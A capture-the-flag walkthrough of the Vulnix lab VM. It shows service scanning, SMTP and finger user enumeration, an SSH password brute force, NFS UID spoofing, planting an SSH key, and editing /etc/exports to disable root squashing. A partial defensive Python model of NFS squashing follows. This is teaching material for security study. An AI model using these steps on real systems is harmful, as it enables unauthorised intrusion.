HackLAB: Vulnix Walkthrough

Kanishka
17 min read
May 17, 2017


Vulnix is a boot to root virtual machine which is hosted on Vulnhub.

Description of the challenge

Here we have a vulnerable Linux host with configuration weaknesses rather than purposely vulnerable software versions (well at the time of release anyway!)
The host is based upon Ubuntu Server 12.04 and is fully patched as of early September 2012. The details are as follows:

Architecture: x86
Format: VMware (vmx & vmdk) compatibility with version 4 onwards
RAM: 512MB
Network: NAT
Extracted size: 820MB
Compressed (download size): 194MB — 7zip format — 7zip can be obtained from here
MD5 Hash of Vulnix.7z: 0bf19d11836f72d22f30bf52cd585757

The goal; boot up, find the IP, hack away and obtain the trophy hidden away in /root by any means you wish — excluding the actual hacking of the vmdk
Feel free to contact me with any questions/comments using the comments section below.
Enjoy!
Source: http://www.rebootuser.com/?p=933

Identify the IP address of Vulnix machine
Nmap Ping Scan

root@kali:~# nmap -sn 192.168.1.1/24
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-16 11:50 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0030s latency).
MAC Address: A0:63:91:F0:CC:4B (Netgear)
Nmap scan report for 192.168.1.10
Host is up (0.26s latency).
MAC Address: BC:9F:EF:69:35:19 (Unknown)
Nmap scan report for 192.168.1.11
Host is up (0.00033s latency).
MAC Address: F4:0F:24:33:5E:D1 (Unknown)
Nmap scan report for 192.168.1.12
Host is up (0.31s latency).
MAC Address: 04:56:04:47:D4:5C (Unknown)
Nmap scan report for 192.168.1.13
Host is up (0.16s latency).
MAC Address: 68:37:E9:88:16:5F (Unknown)
Nmap scan report for 192.168.1.33
Host is up (0.00039s latency).
MAC Address: 08:00:27:88:C9:95 (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.1.34
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 10.64 seconds
root@kali:~#

Identify services running on Vulnix

root@kali:~# nmap -sT -sV -A -O -v -p 1-65535 192.168.1.33
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-16 11:51 EDT
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating ARP Ping Scan at 11:51
Scanning 192.168.1.33 [1 port]
Completed ARP Ping Scan at 11:51, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:51
Completed Parallel DNS resolution of 1 host. at 11:51, 0.01s elapsed
Initiating Connect Scan at 11:51
Scanning 192.168.1.33 [65535 ports]
Discovered open port 995/tcp on 192.168.1.33
Discovered open port 143/tcp on 192.168.1.33
Discovered open port 993/tcp on 192.168.1.33
Discovered open port 25/tcp on 192.168.1.33
Discovered open port 111/tcp on 192.168.1.33
Discovered open port 22/tcp on 192.168.1.33
Discovered open port 110/tcp on 192.168.1.33
Discovered open port 60351/tcp on 192.168.1.33
Discovered open port 513/tcp on 192.168.1.33
Discovered open port 2049/tcp on 192.168.1.33
Discovered open port 35544/tcp on 192.168.1.33
Discovered open port 514/tcp on 192.168.1.33
Discovered open port 79/tcp on 192.168.1.33
Discovered open port 56569/tcp on 192.168.1.33
Discovered open port 41281/tcp on 192.168.1.33
Discovered open port 44880/tcp on 192.168.1.33
Discovered open port 512/tcp on 192.168.1.33
Completed Connect Scan at 11:51, 2.84s elapsed (65535 total ports)
Initiating Service scan at 11:51
Scanning 17 services on 192.168.1.33
Completed Service scan at 11:52, 31.26s elapsed (17 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.33
NSE: Script scanning 192.168.1.33.
Initiating NSE at 11:52
Completed NSE at 11:52, 10.27s elapsed
Initiating NSE at 11:52
Completed NSE at 11:52, 0.03s elapsed
Nmap scan report for 192.168.1.33
Host is up (0.00048s latency).
Not shown: 65518 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=vulnix
| Issuer: commonName=vulnix
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:12
| Not valid after: 2022-08-31T17:40:12
| MD5: 58e3 f1ac fef6 b6d1 744c 836f ba24 4f0a
|_SHA-1: 712f 69ba 8c54 32e5 711c 898b 55ab 0a83 44a0 420b
|_ssl-date: 2017-05-16T15:52:24+00:00; +2s from scanner time.
79/tcp open finger Linux fingerd
|_finger: No one logged on.
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL STLS SASL RESP-CODES PIPELINING TOP CAPA
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
|_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
|_ssl-date: 2017-05-16T15:52:24+00:00; +2s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 35544/tcp mountd
| 100005 1,2,3 41806/udp mountd
| 100021 1,3,4 44784/udp nlockmgr
| 100021 1,3,4 56569/tcp nlockmgr
| 100024 1 41281/tcp status
| 100024 1 59005/udp status
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
143/tcp open imap Dovecot imapd
|_imap-capabilities: ID IDLE Pre-login listed LITERAL+ capabilities post-login ENABLE have OK more IMAP4rev1 LOGINDISABLEDA0001 SASL-IR STARTTLS LOGIN-REFERRALS
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
|_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
|_ssl-date: 2017-05-16T15:52:24+00:00; +2s from scanner time.
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: ID IDLE listed LITERAL+ capabilities post-login ENABLE have OK more IMAP4rev1 Pre-login SASL-IR AUTH=PLAINA0001 LOGIN-REFERRALS
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
|_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
|_ssl-date: 2017-05-16T15:52:24+00:00; +2s from scanner time.
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: UIDL USER SASL(PLAIN) RESP-CODES PIPELINING TOP CAPA
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
|_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
|_ssl-date: 2017-05-16T15:52:24+00:00; +2s from scanner time.
2049/tcp open nfs_acl 2-3 (RPC #100227)
35544/tcp open mountd 1-3 (RPC #100005)
41281/tcp open status 1 (RPC #100024)
44880/tcp open mountd 1-3 (RPC #100005)
56569/tcp open nlockmgr 1-4 (RPC #100021)
60351/tcp open mountd 1-3 (RPC #100005)

MAC Address: 08:00:27:88:C9:95 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Uptime guess: 0.001 days (since Tue May 16 11:51:37 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
TRACEROUTE
HOP RTT ADDRESS
1 0.48 ms 192.168.1.33
NSE: Script Post-scanning.
Initiating NSE at 11:52
Completed NSE at 11:52, 0.00s elapsed
Initiating NSE at 11:52
Completed NSE at 11:52, 0.00s elapsed
Post-scan script results:
| clock-skew:
|_ 2s: Majority of systems scanned
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.59 seconds
Raw packets sent: 23 (1.806KB) | Rcvd: 15 (1.278KB)
root@kali:~#

Port 22 — Inspecting SSH — OpenSSH 5.9p1

No suitable exploits were found for this OpenSSH version, so we move on.

Port 25 — Inspecting SMTP — Postfix smtpd

Postfix advertises the VRFY command, which lets us confirm valid account names one by one. We have successfully enumerated a list of users this way; let's save them in a file.

root@kali:~/Desktop/B2R# cat users.txt
backup
bin
daemon
games
gnats
irc
libuuid
list
lp
mail
man
messagebus
news
nobody
postmaster
proxy
sshd
sync
sys
syslog
user
uucp
www-data
root@kali:~/Desktop/B2R#

Or we could use smtp-user-enum to do the same.

root@kali:~# smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.1.33
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /usr/share/metasploit-framework/data/wordlists/unix_users.txt
Target count ............. 1
Username count ........... 111
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Tue May 16 14:21:47 2017 #########
192.168.1.33: ROOT exists
192.168.1.33: backup exists
192.168.1.33: bin exists
192.168.1.33: daemon exists
192.168.1.33: games exists
192.168.1.33: gnats exists
192.168.1.33: irc exists
192.168.1.33: libuuid exists
192.168.1.33: list exists
192.168.1.33: lp exists
192.168.1.33: mail exists
192.168.1.33: man exists
192.168.1.33: messagebus exists
192.168.1.33: news exists
192.168.1.33: nobody exists
192.168.1.33: postmaster exists
192.168.1.33: proxy exists
192.168.1.33: root exists
192.168.1.33: sshd exists
192.168.1.33: sync exists
192.168.1.33: sys exists
192.168.1.33: syslog exists
192.168.1.33: user exists
192.168.1.33: uucp exists
192.168.1.33: www-data exists
######## Scan completed at Tue May 16 14:21:47 2017 #########
25 results.
111 queries in 1 seconds (111.0 queries / sec)
root@kali:~#

Port 79 — Inspecting Finger — Linux fingerd

root@kali:~/Desktop/B2R# git clone https://github.com/Kan1shka9/Finger-User-Enumeration.git
Cloning into 'Finger-User-Enumeration'...
remote: Counting objects: 12, done.
remote: Compressing objects: 100% (10/10), done.
remote: Total 12 (delta 2), reused 3 (delta 0), pack-reused 0
Unpacking objects: 100% (12/12), done.
Checking connectivity... done.
root@kali:~/Desktop/B2R# cd Finger-User-Enumeration/
root@kali:~/Desktop/B2R/Finger-User-Enumeration# ls
finger_enum_user.sh README.md
root@kali:~/Desktop/B2R/Finger-User-Enumeration# ./finger_enum_user.sh
Script takes a file with a list of users as argument
Usage:
./finger_enum_user.sh <filename.txt>
root@kali:~/Desktop/B2R/Finger-User-Enumeration# ./finger_enum_user.sh ../users.txt
User :
No one logged on.
User : backup
Login: backup Name: backup
Directory: /var/backups Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : bin
Login: bin Name: bin
Directory: /bin Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : daemon
No one logged on.
Login: daemon Name: daemon
Directory: /usr/sbin Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
Login: usbmux Name: usbmux daemon
Directory: /var/lib/usbmux Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: avahi Name: Avahi mDNS daemon
Directory: /var/run/avahi-daemon Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: colord Name: colord colour management daemon
Directory: /var/lib/colord Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: pulse Name: PulseAudio daemon
Directory: /var/run/pulse Shell: /bin/false
Never logged in.
No mail.
No Plan.
User : games
No one logged on.
Login: games Name: games
Directory: /usr/games Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
User : gnats
No one logged on.
Login: gnats Name: Gnats Bug-Reporting System (admin)
Directory: /var/lib/gnats Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
User : irc
No one logged on.
Login: irc Name: ircd
Directory: /var/run/ircd Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
User : libuuid
Login: libuuid Name:
Directory: /var/lib/libuuid Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : list
Login: list Name: Mailing List Manager
Directory: /var/list Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : lp
Login: lp Name: lp
Directory: /var/spool/lpd Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : mail
Login: mail Name: mail
Directory: /var/mail Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: dovecot Name: Dovecot mail server
Directory: /usr/lib/dovecot Shell: /bin/false
Never logged in.
No mail.
No Plan.
User : man
Login: man Name: man
Directory: /var/cache/man Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : messagebus
Login: messagebus Name:
Directory: /var/run/dbus Shell: /bin/false
Never logged in.
No mail.
No Plan.
User : news
No one logged on.
Login: news Name: news
Directory: /var/spool/news Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
User : nobody
No one logged on.
Login: nobody Name: nobody
Directory: /nonexistent Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
User : postmaster
finger: postmaster: no such user.
User : proxy
Login: proxy Name: proxy
Directory: /bin Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : sshd
No one logged on.
Login: sshd Name:
Directory: /var/run/sshd Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
User : sync
No one logged on.
Login: sync Name: sync
Directory: /bin Shell: /bin/sync
Never logged in.
No mail.
No Plan.
User : sys
Login: sys Name: sys
Directory: /dev Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : syslog
Login: syslog Name:
Directory: /home/syslog Shell: /bin/false
Never logged in.
No mail.
No Plan.
User : user
Login: user Name: user
Directory: /home/user Shell: /bin/bash
Last login Tue May 16 01:47 (BST) on pts/0 from 192.168.1.34
No mail.
No Plan.
Login: dovenull Name: Dovecot login user
Directory: /nonexistent Shell: /bin/false
Never logged in.
No mail.
No Plan.
User : uucp
Login: uucp Name: uucp
Directory: /var/spool/uucp Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : www-data
Login: www-data Name: www-data
Directory: /var/www Shell: /bin/sh
Never logged in.
No mail.
No Plan.
root@kali:~/Desktop/B2R/Finger-User-Enumeration#

Port 111 — Enumerating RPC — rpcbind 2–4

The RPC portmapper is running, so we can list the registered RPC programs with rpcinfo.

root@kali:~# rpcinfo -p 192.168.1.33
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 59005 status
100024 1 tcp 41281 status
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100227 2 tcp 2049
100227 3 tcp 2049
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100227 2 udp 2049
100227 3 udp 2049
100021 1 udp 44784 nlockmgr
100021 3 udp 44784 nlockmgr
100021 4 udp 44784 nlockmgr
100021 1 tcp 56569 nlockmgr
100021 3 tcp 56569 nlockmgr
100021 4 tcp 56569 nlockmgr
100005 1 udp 58554 mountd
100005 1 tcp 60351 mountd
100005 2 udp 45706 mountd
100005 2 tcp 44880 mountd
100005 3 udp 41806 mountd
100005 3 tcp 35544 mountd
root@kali:~#

rpcinfo shows NFS registered on both TCP and UDP port 2049, so let's confirm that with nmap.

root@kali:~# nmap -sU -sT -p 2049 192.168.1.33
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-16 16:06 EDT
Nmap scan report for 192.168.1.33
Host is up (0.00035s latency).
PORT STATE SERVICE
2049/tcp open nfs
2049/udp open nfs

MAC Address: 08:00:27:88:C9:95 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
root@kali:~#

To inspect the exports we need showmount, which ships in the nfs-common package.

$ apt-cache search showmount
nfs-common - NFS support files common to client and server
$ apt-get install nfs-common

NFS Enumeration

root@kali:~# showmount -h
Usage: showmount [-adehv]
[--all] [--directories] [--exports]
[--no-headers] [--help] [--version] [host]
root@kali:~# showmount --exports 192.168.1.33
Export list for 192.168.1.33:
/home/vulnix *

Let's mount the remote share on our local machine.

root@kali:~# mkdir /tmp/nfs
root@kali:~# mount -t nfs 192.168.1.33:/home/vulnix /tmp/nfs
root@kali:~# cd /tmp/nfs
-bash: cd: /tmp/nfs: Permission denied
root@kali:~#

We get Permission denied on the mounted share even though we are root locally. The reason is root squashing, which is on by default for NFS exports: the server maps any request that arrives with UID 0 to the anonymous user (nobody, UID 65534 by default), so our root gets no more access to /home/vulnix than an unknown user would.

Let's try to break into the machine by brute-forcing the SSH password of the account user, the only account finger showed with a real login shell and a recent login.

root@kali:~# hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.1.33 ssh -t 4
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-16 18:04:07
[DATA] max 4 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~56032 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 64.00 tries/min, 64 tries in 00:01h, 14344335 to do in 3735:31h, 4 active
[STATUS] 61.33 tries/min, 184 tries in 00:03h, 14344215 to do in 3897:54h, 4 active
[STATUS] 60.57 tries/min, 424 tries in 00:07h, 14343975 to do in 3946:51h, 4 active
[22][ssh] host: 192.168.1.33 login: user password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-16 18:12:43
root@kali:~#

Now that we have the SSH username and password, let's log in to the machine.

root@kali:~# ssh user@192.168.1.33
user@192.168.1.33's password: letmein
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/

System information as of Tue May 16 20:58:15 BST 2017

System load: 0.07 Processes: 86
Usage of /: 90.4% of 773MB Users logged in: 0
Memory usage: 10% IP address for eth0: 192.168.1.33
Swap usage: 0%

=> / is using 90.4% of 773MB

Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Tue May 16 20:33:51 2017 from 192.168.1.34
user@vulnix:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),100(users)
user@vulnix:~$ sudo -l
[sudo] password for user:
Sorry, user user may not run sudo on vulnix.
user@vulnix:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
postfix:x:104:110::/var/spool/postfix:/bin/false
dovecot:x:105:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:106:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false
user@vulnix:~$

Unfortunately our user is not one of the sudoers. But the good thing is we now have the UID and GID of the user vulnix (2008). With the default AUTH_SYS security flavour the NFS server trusts whatever UID and GID the client presents, and only UID 0 gets squashed, so we can create a user vulnix with UID 2008 on our local machine and access the mounted share /tmp/nfs/ as that user.

root@kali:~# useradd -u 2008 vulnix
root@kali:~# tail -1 /etc/passwd
vulnix:x:2008:2008::/home/vulnix:/bin/sh
root@kali:~# su vulnix
$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
$ cd /tmp/nfs
$ ls -la
total 20
drwxr-x--- 2 vulnix vulnix 4096 Sep 2 2012 .
drwxrwxrwt 15 root root 4096 May 16 18:17 ..
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
$ pwd
/tmp/nfs

Now let's gain SSH access as vulnix by copying our SSH public key onto /tmp/nfs.

Generate SSH keys

root@kali:~# ls /root/.ssh/
root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:VoZMUJiHramBTJnCofq3Osa2s3JaFFJP0yct0V5KKwU root@kali
The key's randomart image is:
+---[RSA 2048]----+
|..ooo.E%o |
|oo+o .BoO.. |
|o+... @o+o |
|..o.. + +o |
|. . o .S |
| o . . |
| .o . |
|..B. . |
|.*+*. |
+----[SHA256]-----+
root@kali:~# ls /root/.ssh/
id_rsa id_rsa.pub
root@kali:~# cat /root/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC42NpxutFyfjQuOtZRiHzS/HRgCDQZZrrmizKrLmnhWy4RbzMqFc/URB22QtHkQLnX4libQkGKaSce2bEE2mF0DKB8oX/O9L+J7BYf5d7C6UQ1fLXN1Tg3Ls4QbKBrQGKPH14rdmzSe+ESKc5fE+cvBhB7f8Ub4HnZTDhLCSLJoyzNf85BkU/QjjWymxEXaoSDhg9vPgXEeQAAUCikkpcTwE5PVGG8z+m1fR0OZnzm45sfe2b+NI18owH60oGm8n8O6jOivsvlohXpNrcCm2Ago994zVA4V9ntPd6owXb77Wu1w8Zz1x1dK79QvIook18B6SIhnjJWyFgxHox2Gg8F root@kali
root@kali:~#

Copy the public SSH key over to vulnix through the mounted share.

root@kali:~# su vulnix
$ cd /tmp/nfs
$ ls -la
total 20
drwxr-x--- 2 vulnix vulnix 4096 May 16 16:25 .
drwxrwxrwt 15 root root 4096 May 16 18:36 ..
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
$ mkdir .ssh
$ cd .ssh
$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC42NpxutFyfjQuOtZRiHzS/HRgCDQZZrrmizKrLmnhWy4RbzMqFc/URB22QtHkQLnX4libQkGKaSce2bEE2mF0DKB8oX/O9L+J7BYf5d7C6UQ1fLXN1Tg3Ls4QbKBrQGKPH14rdmzSe+ESKc5fE+cvBhB7f8Ub4HnZTDhLCSLJoyzNf85BkU/QjjWymxEXaoSDhg9vPgXEeQAAUCikkpcTwE5PVGG8z+m1fR0OZnzm45sfe2b+NI18owH60oGm8n8O6jOivsvlohXpNrcCm2Ago994zVA4V9ntPd6owXb77Wu1w8Zz1x1dK79QvIook18B6SIhnjJWyFgxHox2Gg8F root@kali > authorized_keys

Let's log in to vulnix as the vulnix user.

root@kali:~# ssh vulnix@192.168.1.33
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/

System information as of Tue May 16 21:42:24 BST 2017

System load: 0.0 Processes: 86
Usage of /: 90.4% of 773MB Users logged in: 0
Memory usage: 10% IP address for eth0: 192.168.1.33
Swap usage: 0%

=> / is using 90.4% of 773MB

Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Tue May 16 21:35:17 2017 from 192.168.1.34
vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$

The above output shows that vulnix is one of the sudoers: he can run sudoedit /etc/exports as root, without a password. That lets us disable root squashing on the export by replacing root_squash with no_root_squash.

vulnix@vulnix:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
vulnix@vulnix:~$ sudoedit /etc/exports
vulnix@vulnix:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,no_root_squash)
vulnix@vulnix:~$
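To see why root was refused on /tmp/nfs, why a local user with UID 2008 was let in, and what the no_root_squash edit changes, here is a small Python model of the server-side decision. It is an added example, not part of the original walkthrough: it parses the two /etc/exports lines from above, applies the root_squash / no_root_squash / all_squash mapping to the UID and GID the client presents (NFS with AUTH_SYS simply believes those numbers), and runs an ordinary mode-bit check against the 750, vulnix-owned home directory seen in the ls -la output. The anonymous UID/GID of 65534 is the exports(5) default; the audit() helper is an assumed defender-side review of a single export line.

```python
import re

ANON_UID = 65534  # exports(5) default anonuid ("nobody"); anongid has the same default
ANON_GID = 65534

# Copied from the walkthrough: the export before and after the sudoedit.
EXPORTS_BEFORE = "/home/vulnix *(rw,root_squash)"
EXPORTS_AFTER = "/home/vulnix *(rw,no_root_squash)"

# drwxr-x--- vulnix vulnix, as shown by ls -la on the mounted share.
HOME_MODE, HOME_UID, HOME_GID = 0o750, 2008, 2008

CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Turn /etc/exports text into a list of (path, client, options) tuples.
    Comments and blank lines are skipped; a client with no option list gets an
    empty dict, which exportfs treats as the defaults (ro, root_squash)."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients:
            m = CLIENT_RE.match(spec)
            if m is None:
                raise ValueError(f"malformed client spec: {spec!r}")
            client = m.group(1) or "*"  # "(rw)" with no host means every host
            options = {}
            for opt in (m.group(2) or "").split(","):
                opt = opt.strip()
                if opt:
                    key, _, value = opt.partition("=")
                    options[key] = value or True
            exports.append((path, client, options))
    return exports


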